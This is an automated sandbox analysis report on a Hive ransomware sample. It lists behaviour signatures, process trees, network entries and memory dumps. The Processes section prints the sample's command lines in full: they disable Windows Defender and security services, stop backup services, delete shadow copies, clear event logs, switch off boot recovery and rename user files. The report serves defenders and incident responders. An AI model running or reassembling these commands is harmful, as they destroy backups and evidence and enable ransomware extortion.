Malware Analysis Report

2024-10-16 03:11

Sample ID 220112-q5p7zscgem
Target 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample
SHA256 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402
Tags
hive evasion ransomware spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402

Threat Level: Known bad

The file 08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Deletes Windows Defender Definitions

Modifies security service

Hive

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Deletes shadow copies

Clears Windows event logs

Modifies extensions of user files

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs net.exe

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Analysis: static1

Detonation Overview

Reported

2022-01-12 13:50

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-12 13:50

Reported

2022-01-12 13:53

Platform

win10-en-20211208

Max time kernel

125s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\InvokeFormat.crw => C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\InvokeFormat.crw.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_ihJ4ov1Pkhk0.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File renamed C:\Users\Admin\Pictures\PublishInstall.png => C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A
File opened for modification C:\Users\Admin\Pictures\PublishInstall.png.jH0YrfJLgF7dd_5jMw237Cev3zEcg9ORHf1j21cYCHP_U449wDxsqv40.nhuie C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3440 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3052 wrote to memory of 3176 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4040 wrote to memory of 4080 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4300 wrote to memory of 4252 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4240 wrote to memory of 4376 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4432 wrote to memory of 4340 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4328 wrote to memory of 760 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3232 wrote to memory of 3808 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 2136 wrote to memory of 3272 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3268 wrote to memory of 644 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12e93" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12e93" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12e93" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country  Destination        Domain            Proto
US       52.109.12.18:443                     tcp
US       8.8.8.8:53         time.windows.com  udp
NL       20.101.57.9:123    time.windows.com  udp

Files

memory/3052-115-0x0000000000000000-mapping.dmp

memory/3176-116-0x0000000000000000-mapping.dmp

memory/4040-117-0x0000000000000000-mapping.dmp

memory/4080-118-0x0000000000000000-mapping.dmp

memory/4300-119-0x0000000000000000-mapping.dmp

memory/4252-120-0x0000000000000000-mapping.dmp

memory/4240-121-0x0000000000000000-mapping.dmp

memory/4376-122-0x0000000000000000-mapping.dmp

memory/4432-123-0x0000000000000000-mapping.dmp

memory/4340-124-0x0000000000000000-mapping.dmp

memory/4328-125-0x0000000000000000-mapping.dmp

memory/760-126-0x0000000000000000-mapping.dmp

memory/3232-127-0x0000000000000000-mapping.dmp

memory/3808-128-0x0000000000000000-mapping.dmp

memory/2136-129-0x0000000000000000-mapping.dmp

memory/3272-130-0x0000000000000000-mapping.dmp

memory/3268-131-0x0000000000000000-mapping.dmp

memory/644-132-0x0000000000000000-mapping.dmp

memory/812-133-0x0000000000000000-mapping.dmp

memory/3864-134-0x0000000000000000-mapping.dmp

memory/1064-135-0x0000000000000000-mapping.dmp

memory/1276-136-0x0000000000000000-mapping.dmp

memory/1496-137-0x0000000000000000-mapping.dmp

memory/1704-138-0x0000000000000000-mapping.dmp

memory/1904-139-0x0000000000000000-mapping.dmp

memory/2160-140-0x0000000000000000-mapping.dmp

memory/2480-141-0x0000000000000000-mapping.dmp

memory/2688-142-0x0000000000000000-mapping.dmp

memory/2632-143-0x0000000000000000-mapping.dmp

memory/3124-144-0x0000000000000000-mapping.dmp

memory/2600-145-0x0000000000000000-mapping.dmp

memory/4836-146-0x0000000000000000-mapping.dmp

memory/1088-147-0x0000000000000000-mapping.dmp

memory/4960-148-0x0000000000000000-mapping.dmp

memory/4684-149-0x0000000000000000-mapping.dmp

memory/2980-150-0x0000000000000000-mapping.dmp

memory/4892-151-0x0000000000000000-mapping.dmp

memory/4588-152-0x0000000000000000-mapping.dmp

memory/4748-153-0x0000000000000000-mapping.dmp

memory/2956-154-0x0000000000000000-mapping.dmp

memory/5088-155-0x0000000000000000-mapping.dmp

memory/604-156-0x0000000000000000-mapping.dmp

memory/752-157-0x0000000000000000-mapping.dmp

memory/4604-158-0x0000000000000000-mapping.dmp

memory/4936-159-0x0000000000000000-mapping.dmp

memory/4496-160-0x0000000000000000-mapping.dmp

memory/2192-161-0x0000000000000000-mapping.dmp

memory/2008-162-0x0000000000000000-mapping.dmp

memory/3848-163-0x0000000000000000-mapping.dmp

memory/1940-164-0x0000000000000000-mapping.dmp

memory/2304-165-0x0000000000000000-mapping.dmp

memory/2812-166-0x0000000000000000-mapping.dmp

memory/3056-167-0x0000000000000000-mapping.dmp

memory/4732-168-0x0000000000000000-mapping.dmp

memory/2252-169-0x0000000000000000-mapping.dmp

memory/2316-170-0x0000000000000000-mapping.dmp

memory/3028-171-0x0000000000000000-mapping.dmp

memory/3724-172-0x0000000000000000-mapping.dmp

memory/3840-173-0x0000000000000000-mapping.dmp

memory/3280-174-0x0000000000000000-mapping.dmp

memory/5104-175-0x0000000000000000-mapping.dmp

memory/4120-176-0x0000000000000000-mapping.dmp

memory/2924-177-0x0000000000000000-mapping.dmp

memory/4004-178-0x0000000000000000-mapping.dmp

memory/520-179-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-180-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-181-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-182-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-183-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-184-0x00000168D5CC0000-0x00000168D5CE2000-memory.dmp

memory/520-185-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-186-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-187-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-188-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-189-0x00000168D7FA0000-0x00000168D8016000-memory.dmp

memory/520-190-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-194-0x00000168D5D40000-0x00000168D5D42000-memory.dmp

memory/520-196-0x00000168D5D43000-0x00000168D5D45000-memory.dmp

memory/520-198-0x00000168D5D46000-0x00000168D5D48000-memory.dmp

memory/520-217-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-218-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/2916-220-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-221-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-222-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-223-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-224-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-225-0x000001774D4D0000-0x000001774D4F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6e54df56375acaede52048ff2649bac7
SHA1 fe2b2651742a059072d9bd875137d50232af1479
SHA256 7d7d9f0bdc84d4e934ae983ccc9c5b3339184f8237393dc1daffba4be48d72d1
SHA512 883e18d16a027b2272dbd4437bf078996edee77ff432679987551565c9f15da7b57c18c53429984a9038c654c2fbbbaf2cb8f080067e5c9cb6bb48000cd7d0c2

memory/2916-227-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-229-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-228-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-230-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-231-0x000001774F7A0000-0x000001774F816000-memory.dmp

memory/520-232-0x00000168D5D48000-0x00000168D5D49000-memory.dmp

